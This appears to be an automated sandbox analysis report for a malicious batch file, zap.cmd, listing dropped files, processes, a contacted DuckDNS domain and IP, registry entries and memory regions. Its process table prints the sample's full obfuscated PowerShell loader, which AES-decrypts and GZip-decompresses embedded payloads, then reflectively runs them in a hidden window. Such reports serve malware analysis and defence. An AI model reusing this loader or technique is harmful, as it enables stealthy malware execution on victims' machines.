Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
zap.cmd
|
ASCII text, with very long lines (29358), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_a877394161d3cf447332d615808566972940da62_00000000_314e1f70-3e91-4a95-b30f-9d6ce19559ac\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1056.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1096.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1i1bzk0n.pwe.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2scwnrxj.flu.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kg0slv3m.sqh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qg1oghzr.2er.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with very long lines (2153), with CRLF line terminators
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zap.cmd" "
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd /c \"set __=^&rem\
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\zap.cmd"
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd /c \"set __=^&rem\
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\zap.cmd';$CMIY='ReazBIWdzBIWLzBIWinzBIWeszBIW'.Replace('zBIW',
''),'LXpsBoadXpsB'.Replace('XpsB', ''),'CXFxWopXFxWyTXFxWoXFxW'.Replace('XFxW', ''),'ChSZNiaSZNinSZNigSZNieExSZNiteSZNinSZNisiSZNionSZNi'.Replace('SZNi',
''),'DecehEzompehEzrehEzeehEzssehEz'.Replace('ehEz', ''),'EleFRIUmenFRIUtFRIUAFRIUtFRIU'.Replace('FRIU', ''),'InwXPBvowXPBkwXPBewXPB'.Replace('wXPB',
''),'GeAzGItCAzGIurAzGIrenAzGItAzGIPAzGIrocAzGIessAzGI'.Replace('AzGI', ''),'SWavzpWavzliWavztWavz'.Replace('Wavz', ''),'TrQRjDaQRjDnsQRjDfQRjDorQRjDmFiQRjDnQRjDaQRjDlQRjDBQRjDlQRjDoQRjDckQRjD'.Replace('QRjD',
''),'EQBEyntQBEyrQBEyyPQBEyoiQBEyntQBEy'.Replace('QBEy', ''),'CfrRUrefrRUatfrRUeDfrRUecrfrRUyptfrRUorfrRU'.Replace('frRU',
''),'FrostbEmBastbEse6stbE4SstbEtrstbEinstbEgstbE'.Replace('stbE', ''),'MlFlLailFlLnMlFlLolFlLdlFlLullFlLelFlL'.Replace('lFlL',
'');powershell -w hidden;function iadMU($QWytb){$xHhyf=[System.Security.Cryptography.Aes]::Create();$xHhyf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$xHhyf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$xHhyf.Key=[System.Convert]::($CMIY[12])('tgQIjCkwwZqAzylw/Tfv+EER7SzcL8PBsCAaLmr+5qk=');$xHhyf.IV=[System.Convert]::($CMIY[12])('pSyOatGwmEbEIOKwBSvE0g==');$DSRRZ=$xHhyf.($CMIY[11])();$Quqau=$DSRRZ.($CMIY[9])($QWytb,0,$QWytb.Length);$DSRRZ.Dispose();$xHhyf.Dispose();$Quqau;}function
XBiYS($QWytb){$uSNme=New-Object System.IO.MemoryStream(,$QWytb);$CliDx=New-Object System.IO.MemoryStream;$gFTqG=New-Object
System.IO.Compression.GZipStream($uSNme,[IO.Compression.CompressionMode]::($CMIY[4]));$gFTqG.($CMIY[2])($CliDx);$gFTqG.Dispose();$uSNme.Dispose();$CliDx.Dispose();$CliDx.ToArray();}$uMaFe=[System.IO.File]::($CMIY[0])([Console]::Title);$zflDv=XBiYS
(iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe, 5).Substring(2))));$dcHsS=XBiYS (iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe,
6).Substring(2))));[System.Reflection.Assembly]::($CMIY[1])([byte[]]$dcHsS).($CMIY[10]).($CMIY[6])($null,$null);[System.Reflection.Assembly]::($CMIY[1])([byte[]]$zflDv).($CMIY[10]).($CMIY[6])($null,$null);
"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\wermgr.exe
|
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "5604" "1360" "1232" "2560" "0" "0" "1348" "0" "0" "0" "0" "0"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
http://upx.sf.net
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 5 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
hjxwrm5.duckdns.org
|
12.202.180.134
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
12.202.180.134
|
hjxwrm5.duckdns.org
|
United States
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
ProgramId
|
||
|
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
FileId
|
||
|
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
LowerCaseLongPath
|
||
|
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
LongPathHash
|
||
|
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
Name
|
||
|
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
OriginalFileName
|
||
|
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
Publisher
|
||
|
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
Version
|
||
|
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
BinFileVersion
|
||
|
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
BinaryType
|
||
|
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
ProductName
|
||
|
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
ProductVersion
|
||
|
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
LinkDate
|
||
|
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
BinProductVersion
|
||
|
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
AppxPackageFullName
|
||
|
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
AppxPackageRelativeId
|
||
|
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
Size
|
||
|
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
Language
|
||
|
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
IsOsComponent
|
||
|
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
Usn
|
There are 10 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1A8D57BB000
|
heap
|
page read and write
|
||
|
2528B668000
|
heap
|
page read and write
|
||
|
2528B6AF000
|
heap
|
page read and write
|
||
|
7FFB1E3C0000
|
unkown
|
page read and write
|
||
|
7FFAACEA0000
|
trusted library allocation
|
page read and write
|
||
|
1A8D57F8000
|
heap
|
page read and write
|
||
|
7FFAACD62000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACCA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A8D57B0000
|
heap
|
page read and write
|
||
|
2528B637000
|
heap
|
page read and write
|
||
|
2528B637000
|
heap
|
page read and write
|
||
|
7FFAACB80000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE50000
|
trusted library allocation
|
page read and write
|
||
|
1A8D5850000
|
heap
|
page read and write
|
||
|
6B19B37000
|
stack
|
page read and write
|
||
|
2528B662000
|
heap
|
page read and write
|
||
|
7FFAACF20000
|
trusted library allocation
|
page read and write
|
||
|
2528B684000
|
heap
|
page read and write
|
||
|
7FFAACD3A000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD70000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A8D9410000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACF10000
|
trusted library allocation
|
page read and write
|
||
|
2528B700000
|
heap
|
page read and write
|
||
|
2528D620000
|
heap
|
page read and write
|
||
|
1A8D8642000
|
trusted library allocation
|
page read and write
|
||
|
2528D050000
|
heap
|
page read and write
|
||
|
2528B65E000
|
heap
|
page read and write
|
||
|
7FFAACF30000
|
trusted library allocation
|
page read and write
|
||
|
1A8D5806000
|
heap
|
page read and write
|
||
|
2528B694000
|
heap
|
page read and write
|
||
|
1A8D7AD9000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACF50000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE30000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD80000
|
trusted library allocation
|
page read and write
|
||
|
1A8D5846000
|
heap
|
page read and write
|
||
|
2528B660000
|
heap
|
page read and write
|
||
|
2528B6E5000
|
heap
|
page read and write
|
||
|
84EDA7C000
|
stack
|
page read and write
|
||
|
7FFAACE10000
|
trusted library allocation
|
page read and write
|
||
|
2528B6AE000
|
heap
|
page read and write
|
||
|
7FFAACE20000
|
trusted library allocation
|
page read and write
|
||
|
1A8EFA9D000
|
heap
|
page read and write
|
||
|
2528B6D4000
|
heap
|
page read and write
|
||
|
2528B7B0000
|
heap
|
page read and write
|
||
|
7DF4ED5C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A8D56E0000
|
heap
|
page read and write
|
||
|
2528B600000
|
heap
|
page read and write
|
||
|
1A8D5720000
|
heap
|
page read and write
|
||
|
2528B654000
|
heap
|
page read and write
|
||
|
1A8EFA49000
|
heap
|
page read and write
|
||
|
2528B654000
|
heap
|
page read and write
|
||
|
1A8EF880000
|
heap
|
page execute and read and write
|
||
|
1A8D7490000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD40000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A8D56B0000
|
heap
|
page read and write
|
||
|
7FFAACDA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB90000
|
trusted library allocation
|
page read and write
|
||
|
1A8EFA74000
|
heap
|
page read and write
|
||
|
84ED2FE000
|
unkown
|
page read and write
|
||
|
1A8EFACA000
|
heap
|
page read and write
|
||
|
1A8EF9F0000
|
heap
|
page read and write
|
||
|
7FFAACD50000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACEF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACEC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE70000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD31000
|
trusted library allocation
|
page read and write
|
||
|
1A8EFA42000
|
heap
|
page read and write
|
||
|
2528B750000
|
heap
|
page read and write
|
||
|
7FFAACBAB000
|
trusted library allocation
|
page execute and read and write
|
||
|
2528B6D9000
|
heap
|
page read and write
|
||
|
7FFAACDF0000
|
trusted library allocation
|
page read and write
|
||
|
2528B637000
|
heap
|
page read and write
|
||
|
1A8D5790000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE80000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACED0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A8EF700000
|
heap
|
page read and write
|
||
|
6B19F7D000
|
stack
|
page read and write
|
||
|
1A8E777A000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD20000
|
trusted library allocation
|
page read and write
|
||
|
1A8D7530000
|
heap
|
page read and write
|
||
|
1A8EF711000
|
heap
|
page read and write
|
||
|
84ED67E000
|
stack
|
page read and write
|
||
|
6B19E7E000
|
stack
|
page read and write
|
||
|
7FFB1E3C5000
|
unkown
|
page readonly
|
||
|
2528B5C4000
|
heap
|
page read and write
|
||
|
7FFAACDB0000
|
trusted library allocation
|
page read and write
|
||
|
84ED97F000
|
stack
|
page read and write
|
||
|
7FFAACE40000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB9B000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACF80000
|
trusted library allocation
|
page read and write
|
||
|
1A8D9323000
|
trusted library allocation
|
page read and write
|
||
|
1A8D7C3E000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACEB0000
|
trusted library allocation
|
page read and write
|
||
|
2528B646000
|
heap
|
page read and write
|
||
|
7FFAACB83000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACC30000
|
trusted library allocation
|
page read and write
|
||
|
2528B694000
|
heap
|
page read and write
|
||
|
1A8D5770000
|
heap
|
page read and write
|
||
|
7FFAACDE0000
|
trusted library allocation
|
page read and write
|
||
|
2528B560000
|
heap
|
page read and write
|
||
|
7FFAACF90000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC36000
|
trusted library allocation
|
page read and write
|
||
|
1A8E776E000
|
trusted library allocation
|
page read and write
|
||
|
2528B60D000
|
heap
|
page read and write
|
||
|
2528B691000
|
heap
|
page read and write
|
||
|
7FFAACF70000
|
trusted library allocation
|
page read and write
|
||
|
1A8D55D0000
|
heap
|
page read and write
|
||
|
2528B684000
|
heap
|
page read and write
|
||
|
84ED4FD000
|
stack
|
page read and write
|
||
|
1A8D74C0000
|
trusted library allocation
|
page read and write
|
||
|
1A8EF7C5000
|
heap
|
page read and write
|
||
|
7FFAACE60000
|
trusted library allocation
|
page read and write
|
||
|
1A8D92C6000
|
trusted library allocation
|
page read and write
|
||
|
1A8D57A0000
|
heap
|
page readonly
|
||
|
84ED9FE000
|
stack
|
page read and write
|
||
|
84ED7F9000
|
stack
|
page read and write
|
||
|
2528B694000
|
heap
|
page read and write
|
||
|
1A8D57FA000
|
heap
|
page read and write
|
||
|
1A8D7050000
|
heap
|
page read and write
|
||
|
7FFAACE90000
|
trusted library allocation
|
page read and write
|
||
|
1A8E7701000
|
trusted library allocation
|
page read and write
|
||
|
1A8D9042000
|
trusted library allocation
|
page read and write
|
||
|
2528B5C0000
|
heap
|
page read and write
|
||
|
1A8E79F7000
|
trusted library allocation
|
page read and write
|
||
|
2528B7A0000
|
remote allocation
|
page read and write
|
||
|
1A8D7ADB000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD90000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACDD0000
|
trusted library allocation
|
page read and write
|
||
|
84ED5FF000
|
stack
|
page read and write
|
||
|
1A8EFA04000
|
heap
|
page read and write
|
||
|
1A8EF716000
|
heap
|
page read and write
|
||
|
84ED6F6000
|
stack
|
page read and write
|
||
|
7FFAACEE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3A0000
|
unkown
|
page readonly
|
||
|
7FFAACBA0000
|
trusted library allocation
|
page read and write
|
||
|
1A8D754F000
|
heap
|
page read and write
|
||
|
1A8D79E5000
|
trusted library allocation
|
page read and write
|
||
|
1A8D5775000
|
heap
|
page read and write
|
||
|
1A8D92E6000
|
trusted library allocation
|
page read and write
|
||
|
84ED273000
|
stack
|
page read and write
|
||
|
7FFB1E3B6000
|
unkown
|
page readonly
|
||
|
1A8EF8A0000
|
heap
|
page execute and read and write
|
||
|
1A8D5840000
|
heap
|
page read and write
|
||
|
84ED47E000
|
stack
|
page read and write
|
||
|
1A8D58A2000
|
heap
|
page read and write
|
||
|
84ED87C000
|
stack
|
page read and write
|
||
|
2528D05B000
|
heap
|
page read and write
|
||
|
2528B655000
|
heap
|
page read and write
|
||
|
2528B667000
|
heap
|
page read and write
|
||
|
84EE44E000
|
stack
|
page read and write
|
||
|
7FFAACF60000
|
trusted library allocation
|
page read and write
|
||
|
84ED3FE000
|
stack
|
page read and write
|
||
|
2528B64D000
|
heap
|
page read and write
|
||
|
2528B668000
|
heap
|
page read and write
|
||
|
2528B7B6000
|
heap
|
page read and write
|
||
|
2528B480000
|
heap
|
page read and write
|
||
|
6B19BBE000
|
unkown
|
page read and write
|
||
|
1A8D76F0000
|
heap
|
page execute and read and write
|
||
|
6B19EFE000
|
stack
|
page read and write
|
||
|
2528B64D000
|
heap
|
page read and write
|
||
|
2528B67E000
|
heap
|
page read and write
|
||
|
7FFAACE00000
|
trusted library allocation
|
page read and write
|
||
|
1A8D7701000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB8D000
|
trusted library allocation
|
page execute and read and write
|
||
|
6B1A07B000
|
stack
|
page read and write
|
||
|
2528B663000
|
heap
|
page read and write
|
||
|
84ED778000
|
stack
|
page read and write
|
||
|
1A8D5760000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB84000
|
trusted library allocation
|
page read and write
|
||
|
6B1A17C000
|
stack
|
page read and write
|
||
|
1A8D5818000
|
heap
|
page read and write
|
||
|
2528B67E000
|
heap
|
page read and write
|
||
|
7FFB1E3C2000
|
unkown
|
page readonly
|
||
|
1A8D5778000
|
heap
|
page read and write
|
||
|
6B1A1FF000
|
stack
|
page read and write
|
||
|
1A8D7500000
|
trusted library allocation
|
page read and write
|
||
|
1A8D7B78000
|
trusted library allocation
|
page read and write
|
||
|
84ED8FF000
|
stack
|
page read and write
|
||
|
1A8D7C42000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3A1000
|
unkown
|
page execute read
|
||
|
1A8D56F0000
|
heap
|
page read and write
|
||
|
1A8E7710000
|
trusted library allocation
|
page read and write
|
||
|
2528B7A0000
|
remote allocation
|
page read and write
|
||
|
1A8E78C0000
|
trusted library allocation
|
page read and write
|
||
|
1A8D929A000
|
trusted library allocation
|
page read and write
|
||
|
1A8D7077000
|
heap
|
page read and write
|
||
|
2528B686000
|
heap
|
page read and write
|
||
|
1A8EF8A7000
|
heap
|
page execute and read and write
|
||
|
1A8D56E6000
|
heap
|
page read and write
|
||
|
7FFAACC3C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A8D56EC000
|
heap
|
page read and write
|
||
|
1A8D90D3000
|
trusted library allocation
|
page read and write
|
||
|
2528B580000
|
heap
|
page read and write
|
||
|
1A8EF7D5000
|
heap
|
page read and write
|
||
|
1A8D5802000
|
heap
|
page read and write
|
||
|
7FFAACF00000
|
trusted library allocation
|
page read and write
|
||
|
1A8E778A000
|
trusted library allocation
|
page read and write
|
||
|
2528B655000
|
heap
|
page read and write
|
||
|
7FFAACDC0000
|
trusted library allocation
|
page read and write
|
||
|
84ED57E000
|
stack
|
page read and write
|
||
|
2528B654000
|
heap
|
page read and write
|
||
|
2528B64F000
|
heap
|
page read and write
|
||
|
7FFAACF40000
|
trusted library allocation
|
page read and write
|
||
|
6B19FFE000
|
stack
|
page read and write
|
||
|
2528B6D4000
|
heap
|
page read and write
|
||
|
2528B64D000
|
heap
|
page read and write
|
||
|
7FFAACC66000
|
trusted library allocation
|
page execute and read and write
|
||
|
2528B662000
|
heap
|
page read and write
|
||
|
1A8EF768000
|
heap
|
page read and write
|
||
|
1A8D584D000
|
heap
|
page read and write
|
||
|
84ECFDE000
|
stack
|
page read and write
|
||
|
1A8EFA00000
|
heap
|
page read and write
|
||
|
1A8D78BE000
|
trusted library allocation
|
page read and write
|
||
|
2528D490000
|
heap
|
page read and write
|
||
|
7FFAACBAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A8D778B000
|
trusted library allocation
|
page read and write
|
||
|
84ED37E000
|
stack
|
page read and write
|
||
|
2528B651000
|
heap
|
page read and write
|
||
|
2528B6DA000
|
heap
|
page read and write
|
||
|
2528B6D4000
|
heap
|
page read and write
|
||
|
2528B7A0000
|
remote allocation
|
page read and write
|
||
|
2528B651000
|
heap
|
page read and write
|
||
|
2528B64D000
|
heap
|
page read and write
|
There are 214 hidden memdumps, click here to show them.